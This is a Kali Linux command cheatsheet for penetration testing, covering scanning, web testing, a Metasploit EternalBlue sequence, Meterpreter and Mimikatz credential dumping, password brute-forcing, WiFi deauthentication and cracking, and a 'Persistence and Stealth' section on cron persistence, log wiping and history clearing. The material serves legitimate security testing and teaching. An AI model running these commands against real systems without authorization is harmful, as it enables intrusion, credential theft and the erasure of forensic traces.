Kali Linux Cheatsheet
Kali Linux is a Debian-based Linux distribution specifically designed for digital forensics and penetration testing. Developed and maintained by Offensive Security, Kali Linux comes pre-installed with over 600 penetration testing tools, making it the go-to platform for cybersecurity professionals, ethical hackers, and security researchers worldwide.
Installation and Setup
Download and Installation
# Download Kali Linux ISO
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso
# Verify the checksum: compare the printed hash with the value published on the Kali download page (and check that file's signature) before using the image
sha256sum kali-linux-2024.1-installer-amd64.iso
# Create bootable USB (Linux) - replace /dev/sdX with the USB device itself; dd silently overwrites whatever device it is pointed at
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress
# Create bootable USB (Windows - use Rufus or similar tool)
# Use Rufus, Etcher, or Win32DiskImager
Virtual Machine Setup
# VMware recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum
# Network: NAT or Bridged
# VirtualBox recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum, VDI format
# Network: NAT or Bridged
# Enable VT-x/AMD-V virtualization
Initial Configuration
# Update system
sudo apt update && sudo apt upgrade -y
# Install additional tools
sudo apt install -y kali-linux-large
# Configure non-root user (recommended)
sudo useradd -m -s /bin/bash username
sudo usermod -aG sudo username
sudo passwd username
# Enable SSH (if needed)
sudo systemctl enable ssh
sudo systemctl start ssh
# Configure firewall (if you administer this host over SSH, run `sudo ufw allow ssh` first so the deny-incoming default does not lock you out)
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
Essential Tools and Commands
Information Gathering
# Nmap - network scanning (-sS and -O need root privileges)
nmap -sS -sV -O target_ip
nmap -sC -sV -oA scan_results target_ip
nmap --script vuln target_ip
# Masscan - Fast port scanner
masscan -p1-65535 target_ip --rate=1000
# Dmitry - Information gathering
dmitry -winsepo output.txt target.com
# theHarvester - Email and subdomain gathering
theHarvester -d target.com -l 500 -b google
# Recon-ng - Web reconnaissance framework
recon-ng
[recon-ng][default] > workspaces create target_workspace
[recon-ng][target_workspace] > modules load recon/domains-hosts/google_site_web
Vulnerability Assessment
# OpenVAS - vulnerability scanner
sudo gvm-setup
sudo gvm-start
sudo gvm-feed-update
# Nikto - Web vulnerability scanner
nikto -h http://target.com
nikto -h http://target.com -o nikto_results.txt
# Dirb - Directory brute force
dirb http://target.com
dirb http://target.com /usr/share/dirb/wordlists/big.txt
# Gobuster - Directory/file brute force
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dns -d target.com -w /usr/share/wordlists/dnsmap.txt
# WPScan - WordPress vulnerability scanner
wpscan --url http://target.com --enumerate u,p,t
wpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt
Web Application Testing
# Burp Suite - web application security testing
burpsuite &
# OWASP ZAP - web application scanner
zaproxy &
# SQLmap - SQL injection testing
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump
# Commix - command injection testing
commix --url="http://target.com/page.php?id=1"
# XSSer - cross-site scripting (XSS) testing
xsser --url "http://target.com/search.php?q=XSS" --auto
Exploitation
# Metasploit Framework
msfconsole
msf6 > search type:exploit platform:windows
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS target_ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
# Searchsploit - exploit database search
searchsploit apache 2.4
searchsploit -m 12345.py
# Social Engineering Toolkit
setoolkit
# Select from menu options for phishing, credential harvesting, etc.
# BeEF - Browser exploitation framework
beef-xss
# Access web interface at http://127.0.0.1:3000/ui/panel
Post-exploitation
# Meterpreter commands (within a Metasploit session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps
meterpreter > migrate PID
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\\file.txt /tmp/
meterpreter > upload /tmp/file.txt C:\\
# Empire - PowerShell post-exploitation
powershell-empire server
powershell-empire client
# Mimikatz - Credential extraction
mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
Password Attacks
# John the Ripper - password cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt
# hashcat - Advanced password recovery
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a
# Hydra - Network login cracker
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip
hydra -L users.txt -P passwords.txt ftp://target_ip
hydra -l admin -P /usr/share/wordlists/rockyou.txt target_ip http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"
# Medusa - Parallel login brute force
medusa -h target_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P passwords.txt -M ftp
# Crunch - Wordlist generator
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt
crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt
Wireless Security
# Aircrack-ng suite - WiFi security testing
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Capture specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Reaver - WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Wifite - Automated wireless attack
wifite --wpa --dict /usr/share/wordlists/rockyou.txt
Digital Forensics
# Autopsy - digital forensics platform
autopsy &
# Volatility - memory analysis (Volatility 2 syntax shown; Volatility 3 uses plugin names such as windows.pslist and does not take --profile)
volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=Win7SP1x64 pslist
volatility -f memory.dump --profile=Win7SP1x64 netscan
volatility -f memory.dump --profile=Win7SP1x64 malfind
# Binwalk - Firmware analysis
binwalk firmware.bin
binwalk -e firmware.bin
# Foremost - File carving
foremost -i disk_image.dd -o recovered_files/
# Sleuth Kit - File system analysis
fls -r disk_image.dd
icat disk_image.dd inode_number > recovered_file
Reverse Engineering
# Ghidra - NSA reverse engineering tool
ghidra &
# Radare2 - reverse engineering framework
r2 binary_file
[0x00000000]> aaa
[0x00000000]> pdf @main
# GDB - GNU Debugger
gdb binary_file
(gdb) run
(gdb) break main
(gdb) continue
(gdb) info registers
# Strings - Extract strings from binaries
strings binary_file
strings -n 10 binary_file|grep -i password
# Hexdump - Hex viewer
hexdump -C binary_file|head -20
xxd binary_file|head -20
System Administration
Package Management
# Update package lists
sudo apt update
# Upgrade all packages
sudo apt upgrade -y
# Install specific tools
sudo apt install -y tool_name
# Install Kali metapackages
sudo apt install -y kali-linux-large
sudo apt install -y kali-linux-everything
sudo apt install -y kali-tools-top10
# Search for packages
apt search keyword
apt show package_name
# Remove packages
sudo apt remove package_name
sudo apt purge package_name
sudo apt autoremove
Service Management
# Systemctl commands
sudo systemctl start service_name
sudo systemctl stop service_name
sudo systemctl restart service_name
sudo systemctl enable service_name
sudo systemctl disable service_name
sudo systemctl status service_name
# Common services
sudo systemctl start ssh
sudo systemctl start apache2
sudo systemctl start postgresql
sudo systemctl start mysql
# Check listening ports (netstat comes from the deprecated net-tools package and may be absent; ss is the current equivalent)
netstat -tlnp
ss -tlnp
Network Configuration
# Interface configuration
ip addr show
ip link set eth0 up
ip link set eth0 down
# Static IP configuration
sudo nano /etc/network/interfaces
# Add:
# auto eth0
# iface eth0 inet static
# address 192.168.1.100
# netmask 255.255.255.0
# gateway 192.168.1.1
# DNS configuration (where NetworkManager or resolvconf manages this file, manual edits are overwritten; set DNS through that service instead)
sudo nano /etc/resolv.conf
# Add:
# nameserver 8.8.8.8
# nameserver 8.8.4.4
# Restart networking
sudo systemctl restart networking
User Management
# Add user
sudo useradd -m -s /bin/bash username
sudo passwd username
# Add user to groups
sudo usermod -aG sudo username
sudo usermod -aG adm username
# Switch user
su - username
sudo -u username command
# View user information
id username
groups username
finger username
# Lock/unlock user
sudo usermod -L username
sudo usermod -U username
Advanced Techniques
Custom Tool Installation
# Install from source (review the code or check out a release tag before running make install as root)
git clone https://github.com/tool/repository.git
cd repository
make && sudo make install
# Python tools (recent Kali releases mark the system Python as externally managed; if pip3 refuses, use pipx or a virtual environment)
pip3 install tool_name
pip3 install -r requirements.txt
# Go tools
go install github.com/tool/repository@latest
# Ruby gems
gem install tool_name
# Manual installation (verify the archive's checksum or signature before building)
wget https://example.com/tool.tar.gz
tar -xzf tool.tar.gz
cd tool
./configure && make && sudo make install
Environment Customization
# Bash aliases
nano ~/.bashrc
# Add useful aliases:
alias ll='ls -la'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'
# Custom functions
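#######################################
# Extract an archive, choosing the tool from the file extension.
# Arguments: $1 - path to the archive
# Outputs:   extraction tool output on stdout; diagnostics on stderr
# Returns:   1 if the path is not a regular file or the extension is unknown,
#            otherwise the exit status of the extraction tool
#######################################
extract() {
  local archive=$1
  # Quoted expansions so paths containing spaces or globs are handled intact.
  if [[ ! -f "$archive" ]]; then
    echo "'$archive' is not a valid file" >&2
    return 1
  fi
  # Compound suffixes (.tar.bz2, .tar.gz) must be matched before .bz2/.gz.
  case "$archive" in
    *.tar.bz2) tar -xjf "$archive" ;;
    *.tar.gz)  tar -xzf "$archive" ;;
    *.bz2)     bunzip2 "$archive" ;;
    *.rar)     unrar e "$archive" ;;
    *.gz)      gunzip "$archive" ;;
    *.tar)     tar -xf "$archive" ;;
    *.tbz2)    tar -xjf "$archive" ;;
    *.tgz)     tar -xzf "$archive" ;;
    *.zip)     unzip "$archive" ;;
    *.Z)       uncompress "$archive" ;;
    *.7z)      7z x "$archive" ;;
    *)
      echo "'$archive' cannot be extracted via extract()" >&2
      return 1
      ;;
  esac
}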
# Source the changes
source ~/.bashrc
Automation Scripts
# Basic reconnaissance script (save it as its own file: the #!/bin/bash line must be the first line of that file)
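#!/bin/bash
# Basic reconnaissance script: runs nmap, gobuster and nikto against one
# target and stores every result under results/<target>/.
# Usage:    ./recon.sh <target>   (target: hostname or IP address)
# Requires: nmap, gobuster, nikto; nmap -sS/-O need root privileges.
set -u

objetivo=${1:-}
if [ -z "$objetivo" ]; then
  echo "uso: $0 <objetivo>"
  exit 1
fi
# The argument becomes part of an output path and of tool command lines, so
# accept only hostname/IP characters: no "/", no "..", no leading "-",
# no whitespace or shell metacharacters.
if [[ ! "$objetivo" =~ ^[A-Za-z0-9][A-Za-z0-9._:-]*$ || "$objetivo" == *..* ]]; then
  echo "invalid target: '$objetivo' (expected a hostname or IP address)" >&2
  exit 1
fi
outdir="results/$objetivo"
echo "Starting reconocimiento on $objetivo"
mkdir -p -- "$outdir" || exit 1
# Each step reports its own failure but the script carries on, as before,
# so a closed web port does not lose the nmap results already written.
# Nmap scan
echo "Running Nmap scan..."
nmap -sS -sV -sC -O -oA "$outdir/nmap_scan" "$objetivo" || echo "nmap failed (exit $?)" >&2
# Directory enumeration
echo "Running directory enumeración..."
gobuster dir -u "http://$objetivo" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o "$outdir/gobuster.txt" || echo "gobuster failed (exit $?)" >&2
# Nikto scan
echo "Running Nikto scan..."
nikto -h "http://$objetivo" -o "$outdir/nikto.txt" || echo "nikto failed (exit $?)" >&2
echo "reconocimiento complete. Results saved in results/$objetivo/"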
Persistence and Stealth
# SSH key persistence
ssh-keygen -t rsa -b 4096
ssh-copy-id user@target_ip
# Cron job persistence
crontab -e
# Add: @reboot /path/to/script.sh
# Service persistence
sudo nano /etc/systemd/system/custom.service
# Create service file for persistence
# Log cleaning
sudo truncate -s 0 /var/log/auth.log
sudo truncate -s 0 /var/log/syslog
history -c && history -w
# Process hiding
nohup ./malicious_binary > /dev/null 2>&1 &
disown
Troubleshooting
Common Issues
# WiFi adapter not working
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
# VirtualBox guest additions
sudo apt install -y virtualbox-guest-x11
sudo VBoxClient --clipboard
sudo VBoxClient --draganddrop
# Graphics issues
sudo apt install -y kali-desktop-xfce
sudo dpkg-reconfigure lightdm
# Sound issues
sudo apt install -y pulseaudio
pulseaudio --start
# Network issues
sudo dhclient eth0
sudo systemctl restart networking
sudo systemctl restart NetworkManager
Performance Optimization
# Disable unnecessary services
sudo systemctl disable bluetooth
sudo systemctl disable cups
sudo systemctl disable avahi-daemon
# Clean system
sudo apt autoremove
sudo apt autoclean
sudo apt clean
# Monitor resources
htop
iotop
nethogs
iftop
# Optimize for VMs
sudo apt install -y open-vm-tools
sudo apt install -y virtualbox-guest-utils
Security Best Practices
Operational Security
# Use VPN for testing
sudo openvpn config.ovpn
# Proxy chains configuration
sudo nano /etc/proxychains.conf
proxychains nmap target_ip
# Tor usage
sudo systemctl start tor
proxychains firefox
# MAC address randomization
sudo macchanger -r wlan0
sudo macchanger -m 00:11:22:33:44:55 wlan0
# Secure deletion (overwrite-based tools such as shred and wipe cannot guarantee erasure on journaling or copy-on-write filesystems or on SSDs; full-disk encryption is the reliable protection there)
shred -vfz -n 3 sensitive_file
wipe -rf directory/
Legal and Ethical Considerations
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Respect privacy and data protection laws
# Create engagement documentation
echo "Penetration Test authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: IP ranges, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt